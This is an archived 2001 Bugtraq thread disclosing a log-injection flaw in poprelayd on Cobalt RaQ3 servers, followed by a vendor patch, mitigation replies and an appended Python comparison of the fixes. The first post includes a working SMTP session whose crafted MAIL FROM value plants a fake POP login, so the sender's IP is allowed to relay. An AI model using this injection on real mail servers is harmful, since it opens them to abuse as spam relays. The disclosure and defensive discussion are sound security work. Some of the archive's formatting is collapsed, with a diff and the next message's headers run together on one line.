6706890 2001-07-03 19:05 +0200 /64 lines/ Andrea Barisani <lcars@infis.univ.trieste.it>
Sent by: joel@lysator.liu.se
Imported: 2001-07-04 21:53 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17784>
Subject: poprelayd and sendmail relay authentication problem (Cobalt Raq3)
------------------------------------------------------------
From: Andrea Barisani <lcars@infis.univ.trieste.it>
To: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.10.10107031827400.24489-100000@sole.infis.univ.trieste.it>

Hi to all,

Poprelayd is a simple script that scans /var/log/maillog for valid pop logins
and updates a hash db used by sendmail to permit relaying for those valid pop
users. This method is called "Pop-before-smtp".

The syslog string searched by the script is in this form for the qpop server:

/POP login by user \"[\-\_\w]+\" at \(.+\) ([0-9\.]+)/

On some cobalt raq3 servers (with the poprelayd add-on packet installed) and
in general on any system running the poprelayd script with sendmail it is
possible to "inject" this string in the syslog using sendmail logging. So
anyone can insert a fake string with his own IP which will be parsed by
poprelayd and that will permit the use of sendmail as a relay.

On cobalts the presence of poprelayd is revealed by the modified sendmail
relaying denied message "Relaying denied. Please check your mail first."

Example:

telnet dumbcobalt 25
Trying 123.123.123.123...
Connected to dumbcobalt
...
ehlo dumbcobalt
...
mail from:"POP login by user "admin" at (66.66.66.66) 66.66.66.66 @linux.org"
553 "POP login by user "admin" at (66.66.66.66) 66.66.66.66 @linux.org"...Domain name required

now the IP 66.66.66.66 can do relay :)

in fact, on dumbcobalt:

in /var/log/maillog

...reject=533 "POP login by user "admin" at (66.66.66.66) 66.66.66.66 @linux.org", size=0, class=0 ....etc etc...

[root@dumbcobalt /]# /usr/sbin/poprelayd -p 66.66.66.66
7

;-)

Bye

------------------------------------------------------------
INFIS Network Administrator & Security Officer
Department of Physics - University of Trieste
lcars@infis.univ.trieste.it - PGP Key 0x8E21FE82
------------------------------------------------------------
"How would you know I'm mad?" said Alice.
"You must be," said the Cat, "or you wouldn't have come here."
------------------------------------------------------------
(6706890) /Andrea Barisani <lcars@infis.univ.trieste.it>/(Reflowed)
Comment in text 6727613 by Will DeHaan <eclipse@sun.com>

6727613 2001-07-09 12:03 -0700 /38 lines/ Will DeHaan <eclipse@sun.com>
Sent by: joel@lysator.liu.se
Imported: 2001-07-10 02:41 by Brevbäraren
External recipient: Andrea Barisani <lcars@infis.univ.trieste.it>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17873>
Comment to text 6706890 by Andrea Barisani <lcars@infis.univ.trieste.it>
Subject: Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3)
------------------------------------------------------------
Andrea Barisani wrote:
>
> On some cobalt raq3 servers (with the poprelayd add-on packet installed )
> and in general on any system running the poprelayd script with sendmail is
> possible to "inject" this string in the syslog using sendmail logging. So
> anyone can insert a fake string with his own IP which will be parsed by
> poprelayd and that will permit the use of sendmail as a relay.

Hello,

Attached you'll find an experimental patch (apply to /usr/local/sbin/poprelayd)
to immediately correct the email relay exploit. This patch is integrated into
the current version 2.0 poprelayd RPM at:

ftp://ftp.cobaltnet.com/pub/experimental/RPMS/poprelayd-2.0-4.noarch.rpm
md5sum 52af3c84c93914908ced089526521330

ftp://ftp.cobaltnet.com/pub/experimental/SRPMS/poprelayd-2.0-4.src.rpm
md5sum 4a526733a2da5cfe996f53032b136e1e

A supported fix to this email relay exploit will be integrated into
forthcoming security update packages for Qube and RaQ products.

Thank you for reporting this issue to Bugtraq. We also appreciate direct
reporting of any Sun Cobalt security issues by sending email to
security@cobalt.com.

Cheers,
-- Will

--
Will DeHaan
Software Engineer                    will.dehaan@sun.com
Sun Cobalt Server Appliances.        Sun Microsystems, Inc.
(6727613) /Will DeHaan <eclipse@sun.com>/-(Reflowed)
Attachment (text/plain) in text 6727614

6727614 2001-07-09 12:03 -0700 /29 lines/ Will DeHaan <eclipse@sun.com>
Attachment filename: "poprelay.regexpoit.patch"
Imported: 2001-07-10 02:41 by Brevbäraren
External recipient: Andrea Barisani <lcars@infis.univ.trieste.it>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17874>
Attachment (text/plain) to text 6727613
Subject: Attachment (poprelay.regexpoit.patch) to: Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3)
------------------------------------------------------------
--- poprelayd-2.0-3 Mon Jul 9 10:29:40 2001
+++ poprelayd Mon Jul 9 10:27:27 2001
@@ -175,16 +175,19 @@ my $s = $_[0]; my @paddrs; # Packed IP addresses. my @addrs; # ASCII addresses. - my $junk; # POP login by user "admin" at (10.9.28.29) 10.9.28.29 - if ($s =~ /POP login by user \"[\-\_\w]+\" at \(.+\) ([0-9\.]+)/) { - return $1; + # ensure line ends at IP address. Filter on rejection codes + if ($s =~ /POP login by user \"[\-\_\w]+\" at \(.+\) ([0-9\.]+)\s*$/) { + my $authuser = $1; + return $authuser unless ($s =~ /reject=\d/i); } # imapd[11676]: Authenticated user=admin host=pyro.cobalt.com [10.9.28.29] - if ($s =~ /Authenticated user=\S+ host=\S+ \[([\d\.]+)\]/) { - return $1; + # ensure line ends at IP address. Filter on rejected syntax. + if ($s =~ /Authenticated user=\S+ host=\S+ \[([\d\.]+)\]\s*$/) { + my $authuser = $1; + return $authuser unless ($s =~ /unknown command/i); } return (); (6727614) /Will DeHaan <eclipse@sun.com>/----------- 6718012 2001-07-06 16:04 -0400 /22 rader/ Christopher X. Candreva <chris@westnet.com> Sänt av: joel@lysator.liu.se Importerad: 2001-07-07 22:03 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <17838> Kommentar till text 6715164 av Ram'on Reyes Carri'on <ramon@cimat.mx> Ärende: Re: poprelayd and sendmail relay authentication problem (Cobalt ------------------------------------------------------------ Raq3) 
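Review bot: The new checks in the "POP login by user" and "Authenticated user" branches are a denylist (the trailing `\s*$` plus the `reject=\d` and `unknown command` filters), not positive identification of the POP/IMAP daemon as the source of the line, so any other program that logs attacker-supplied text at the end of a line without those markers still satisfies the pattern. Anchor both regexes at the start of the syslog line and require the daemon's own program tag before the login text (the timestamp, host and e.g. `imapd[11676]:` shown in the hunk's own comment), as is also suggested elsewhere in this thread, keeping the end-of-line anchor as a second check. Also, `my $authuser = $1;` holds the client IP address, not a user name; `$clientip` would describe it accurately in both branches.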
From: "Christopher X. Candreva" <chris@westnet.com>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.GSO.4.33.0107061602211.16143-100000@westnet>

On Fri, 6 Jul 2001, Ram'on Reyes Carri'on wrote:

> A quick workaround that I have just applied is to make sure that the
> string does not contain /sendmail/ so it cannot be injected into syslog
> via sendmail (may be injected some other way!).

Another workaround is to simply have your POP/IMAP daemons log to their own
facility (ie -- one of the locals). We've done this for years anyway, as it
makes using the logs to find problems much easier.

==========================================================
Chris Candreva -- chris@westnet.com -- (914) 967-7816
WestNet Internet Services of Westchester
http://www.westnet.com/

(6718012) /Christopher X. Candreva <chris@westnet.com>/(Reflowed)
Comment in text 6725821 by Chris Adams <cmadams@hiwaay.net>

6725821 2001-07-07 15:06 -0500 /19 lines/ Chris Adams <cmadams@hiwaay.net>
Sent by: joel@lysator.liu.se
Imported: 2001-07-09 18:28 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17852>
Comment to text 6718012 by Christopher X. Candreva <chris@westnet.com>
Subject: Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3)
------------------------------------------------------------
From: Chris Adams <cmadams@hiwaay.net>
To: bugtraq@securityfocus.com
Message-ID: <20010707150657.A31184@HiWAAY.net>

Once upon a time, Christopher X. Candreva <chris@westnet.com> said:
> Another workaround is to simply have your POP/IMAP daemons log to their own
> facility (ie -- one of the locals). We've done this for years anyway, as it
> makes using the logs to find problems much easier.

Better yet, have your POP daemon update the access file directly, and then
you don't have any of the hokey "tail the log file" stuff going on at all.
All you need to add is a daemon to remove entries from the access file.

--
Chris Adams <cmadams@hiwaay.net>
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.

(6725821) /Chris Adams <cmadams@hiwaay.net>/(Reflowed)
Comment in text 6727425 by Todd R. Eigenschink <todd@tekinteractive.com>
Comment in text 6727497 by <bdoctor@ps-ax.com>
Comment in text 6727532 by Christoph Kuhles <ck-bugtraq@aquatix.de>
Comment in text 6727558 by Jason Clifford <jason@uklinux.net>

6727425 2001-07-09 11:25 -0500 /22 lines/ Todd R. Eigenschink <todd@tekinteractive.com>
Sent by: joel@lysator.liu.se
Imported: 2001-07-10 00:54 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External replies to: todd@tekinteractive.com
Recipient: Bugtraq (import) <17865>
Comment to text 6725821 by Chris Adams <cmadams@hiwaay.net>
Subject: Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3)
------------------------------------------------------------
From: "Todd R. Eigenschink" <todd@tekinteractive.com>
To: bugtraq@securityfocus.com
Message-ID: <15177.56070.650024.937758@rtfm.ofc.tekinteractive.com>

Chris Adams writes:
>Better yet, have your POP daemon update the access file directly, and
>then you don't have any of the hokey "tail the log file" stuff going on
>at all. All you need to add is a daemon to remove entries from the
>access file.

I have patches for qpopper 2.53 and 3.1.2 (and will be forward-porting them
to 4.0.3 this weekend) and the daemon to remove entries. If anyone's
interested, mail me.

Todd

--
Todd R. Eigenschink                TEK Interactive Group, Inc.
todd@tekinteractive.com            http://www.tekinteractive.com/
System Administrator               (219) 459-2521

(6727425) /Todd R. Eigenschink <todd@tekinteractive.com>/

6727497 2001-07-09 00:52 -0600 /20 lines/ <bdoctor@ps-ax.com>
Sent by: joel@lysator.liu.se
Imported: 2001-07-10 01:23 by Brevbäraren
External recipient: Chris Adams <cmadams@hiwaay.net>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17867>
Comment to text 6725821 by Chris Adams <cmadams@hiwaay.net>
Subject: Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3)
------------------------------------------------------------
From: bdoctor@ps-ax.com
To: Chris Adams <cmadams@hiwaay.net>
Cc: bugtraq@securityfocus.com
Message-ID: <200107090652.f696qiu22790@ps-ax.com>

Sorry for the plug, but I can't help myself:

http://ps-ax.com/Relay/

This does what this thread has been speaking of via a patch to Qpopper,
versions from 2.53 to present. I think it fills the void.

-brad

> Better yet, have your POP daemon update the access file directly, and
> then you don't have any of the hokey "tail the log file" stuff going on
> at all. All you need to add is a daemon to remove entries from the
> access file.

(6727497) / <bdoctor@ps-ax.com>/----------(Reflowed)

6727532 2001-07-09 19:04 +0200 /24 lines/ Christoph Kuhles <ck-bugtraq@aquatix.de>
Sent by: joel@lysator.liu.se
Imported: 2001-07-10 01:40 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External replies to: ck-bugtraq@aquatix.de
Recipient: Bugtraq (import) <17868>
Comment to text 6725821 by Chris Adams <cmadams@hiwaay.net>
Subject: Re[2]: poprelayd and sendmail relay authentication problem (Cobalt Raq3)
------------------------------------------------------------
From: Christoph Kuhles <ck-bugtraq@aquatix.de>
To: bugtraq@securityfocus.com
Message-ID: <85-1593912896.20010709190431@aquatix.de>

Hi,

Saturday, July 07, 2001, 10:06:57 PM, you wrote:

CA> Better yet, have your POP daemon update the access file directly, and
CA> then you don't have any of the hokey "tail the log file" stuff going on
CA> at all. All you need to add is a daemon to remove entries from the
CA> access file.

True. If I may recommend popa3d (http://www.openwall.com/popa3d/) for that
... There's a patch available on their website which does exactly that.

Cheers,
Christoph Kuhles
Technical Operations
Aquatix IT-Services

(6727532) /Christoph Kuhles <ck-bugtraq@aquatix.de>/(Reflowed)

6727558 2001-07-09 18:59 +0100 /22 lines/ Jason Clifford <jason@uklinux.net>
Sent by: joel@lysator.liu.se
Imported: 2001-07-10 01:59 by Brevbäraren
External recipient: Chris Adams <cmadams@hiwaay.net>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17869>
Comment to text 6725821 by Chris Adams <cmadams@hiwaay.net>
Subject: Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3)
------------------------------------------------------------
From: Jason Clifford <jason@uklinux.net>
To: Chris Adams <cmadams@hiwaay.net>
Cc: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.30.0107091857530.22708-100000@s1.uklinux.net>

On Sat, 7 Jul 2001, Chris Adams wrote:

> Better yet, have your POP daemon update the access file directly, and
> then you don't have any of the hokey "tail the log file" stuff going on
> at all. All you need to add is a daemon to remove entries from the
> access file.

All of which is an awful horrendous hack.

SMTP AUTH is fairly easy to implement. It's reliable. You don't have to
worry about IPs being accidentally left in a hash resulting in unwanted
relaying and you can properly trace the sender of mails.

Jason

(6727558) /Jason Clifford <jason@uklinux.net>/(Reflowed)
Comment in text 6727923 by Walter Reed <walt@hubinternet.com>

6727923 2001-07-09 17:28 -0700 /33 lines/ Walter Reed <walt@hubinternet.com>
Sent by: joel@lysator.liu.se
Imported: 2001-07-10 08:18 by Brevbäraren
External recipient: Jason Clifford <jason@uklinux.net>
External CC recipient: Chris Adams <cmadams@hiwaay.net>
External CC recipient: bugtraq@securityfocus.com
External replies to: walt@hubinternet.com
Recipient: Bugtraq (import) <17879>
Comment to text 6727558 by Jason Clifford <jason@uklinux.net>
Subject: Re: poprelayd and sendmail relay authentication problem (Cobalt Raq3)
------------------------------------------------------------
From: Walter Reed <walt@hubinternet.com>
To: Jason Clifford <jason@uklinux.net>
Cc: Chris Adams <cmadams@hiwaay.net>, bugtraq@securityfocus.com
Message-ID: <20010709172806.A26264@hubinternet.com>

On Mon, Jul 09, 2001 at 06:59:04PM +0100, Jason Clifford wrote:
> On Sat, 7 Jul 2001, Chris Adams wrote:
>
> > Better yet, have your POP daemon update the access file directly, and
> > then you don't have any of the hokey "tail the log file" stuff going on
> > at all. All you need to add is a daemon to remove entries from the
> > access file.
>
> All of which is an awful horrendous hack.
>
> SMTP AUTH is fairly easy to implement. It's reliable. You don't have to
> worry about IPs being accidentally left in a hash resulting in unwanted
> relaying and you can properly trace the sender of mails.

Actually, I've found SMTP AUTH rather a pain to get right. You have to get a
number of different packages (sasl, openssl, etc.), figure out how to get all
the configure options right, build in the right order, beat sendmail over the
head to get things linked right, etc. Now get the thing to authenticate with
an NT domain controller. This is far from trivial and the howto is weak. I
haven't had the several days it takes to get it working. I don't quite know
how I'm going to do the NT dom auth yet, maybe through a pam module. Anyone
do this already?

Sendmail / postfix / etc. need to integrate SMTP AUTH into the base rather
than the add-on mess we have. It needs to be the default. This may help
combat the open-relay disease we have today as well.
(6727923) /Walter Reed <walt@hubinternet.com>/(Reflowed)

6718096 2001-07-06 21:33 -0400 /37 lines/ Ed Ravin <eravin@panix.com>
Sent by: joel@lysator.liu.se
Imported: 2001-07-07 22:47 by Brevbäraren
External recipient: Ram'on Reyes Carri'on <ramon@cimat.mx>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <17841>
Comment to text 6715164 by Ram'on Reyes Carri'on <ramon@cimat.mx>
Subject: Re: poprelayd and sendmail relay authentication problem
------------------------------------------------------------
From: Ed Ravin <eravin@panix.com>
To: ramon@cimat.mx (Ram'on Reyes Carri'on)
Cc: bugtraq@securityfocus.com
Message-ID: <200107070133.f671Xam02266@panix1.panix.com>

Ram'on Reyes Carri'on writes:
> A quick workaround that I have just applied is to make sure that the
> string does not contain /sendmail/ so it cannot be injected into syslog
> via sendmail (may be injected some other way!).

Better to anchor the pattern match to the beginning of the line, so that
there is no way any program can trick poprelayd. For example:

  if ($s =~ /^\w+\s+\d+\s+\d+:\d+:\d+\s+[^: ]+ (imapd|pop3d)\[(\d+)\]: login: \S*\[(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\]/) {
      ($daemon, $pid, $clientip) = ($1, $2, $3);
      add_to_db($clientip);
  }

The above example is for US-style syslog timestamps, things might be
different elsewhere.

Also, you need to make sure that your syslogd is not accepting traffic from
anywhere except a local Unix-domain socket, since otherwise the attacker
could forge a syslog message directly.

> > The syslog string searched by the script is in this form for the qpop
> > server
> >
> > /POP login by user \"[\-\_\w]+\" at \(.+\) ([0-9\.]+)/
> >
> > On some cobalt raq3 servers (with the poprelayd add-on packet installed )
> > and in general on any system running the poprelayd script with sendmail is
> > possible to "inject" this string in the syslog using sendmail logging. So
> > anyone can insert a fake string with his own IP which will be parsed by
> > poprelayd and that will permit the use of sendmail as a relay.

(6718096) /Ed Ravin <eravin@panix.com>/-------------
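Added example, not code from the thread or from poprelayd itself: the three ways of extracting the client IP discussed in this thread (the original unanchored pattern from the first post, the end-anchored plus reject-filtered pattern from the Cobalt patch, and a start-anchored pattern in the spirit of Ed Ravin's reply) run over two constructed maillog lines, a genuine POP login and the sendmail rejection line carrying the injected string. The log lines, host name, IPs and the `popper` program tag are assumptions.

```python
import re

# Constructed sample /var/log/maillog lines (not taken from the original post).
# Line 2 mimics the injection described in the thread: the "POP login" string
# arrives in a rejected MAIL FROM and is written to the log by sendmail, not
# by the POP daemon.
LOG_LINES = [
    'Jul  3 18:27:40 raq popper[1234]: POP login by user "alice" at (10.9.28.29) 10.9.28.29',
    'Jul  3 18:30:01 raq sendmail[24489]: f63GU1x24489: ruleset=check_mail, '
    'arg1="POP login by user "admin" at (66.66.66.66) 66.66.66.66 @linux.org", '
    'reject=553 "POP login by user "admin" at (66.66.66.66) 66.66.66.66 @linux.org"... Domain name required',
]

# Pattern from the original poprelayd: unanchored, so it matches anywhere in the line.
ORIGINAL = re.compile(r'POP login by user "[\-\_\w]+" at \(.+\) ([0-9\.]+)')
# Pattern from the Cobalt patch: the IP must end the line, and rejection lines are skipped.
PATCHED = re.compile(r'POP login by user "[\-\_\w]+" at \(.+\) ([0-9\.]+)\s*$')
# Start-anchored variant: the syslog prefix (US-style timestamp, host) and the POP
# daemon's program tag must precede the login text. "popper" is an assumed tag.
SYSLOG_PREFIX = r'^\w{3}\s+\d+\s+\d+:\d+:\d+\s+[^: ]+ popper\[\d+\]: '
ANCHORED = re.compile(SYSLOG_PREFIX +
                      r'POP login by user "[\-\_\w]+" at \([^)]+\) (\d{1,3}(?:\.\d{1,3}){3})\s*$')


def extract_original(line):
    """Original behaviour: any line containing the string yields an IP."""
    m = ORIGINAL.search(line)
    return m.group(1) if m else None


def extract_patched(line):
    """Cobalt patch behaviour: end-anchored match, rejection lines ignored."""
    m = PATCHED.search(line)
    if m and not re.search(r'reject=\d', line, re.I):
        return m.group(1)
    return None


def extract_anchored(line):
    """Start-anchored: only the POP daemon's own syslog lines can match."""
    m = ANCHORED.match(line)
    return m.group(1) if m else None


def relay_ips(extractor, lines=LOG_LINES):
    """Set of client IPs the given extractor would add to the relay db."""
    return {ip for ip in map(extractor, lines) if ip}


if __name__ == "__main__":
    for name, fn in (("original", extract_original),
                     ("cobalt patch", extract_patched),
                     ("start-anchored", extract_anchored)):
        print(f"{name:15s}: {sorted(relay_ips(fn))}")
```

Only the original pattern admits 66.66.66.66 from the sendmail line; both fixes reject it, and the start-anchored one does so without depending on what the rejected line happens to contain.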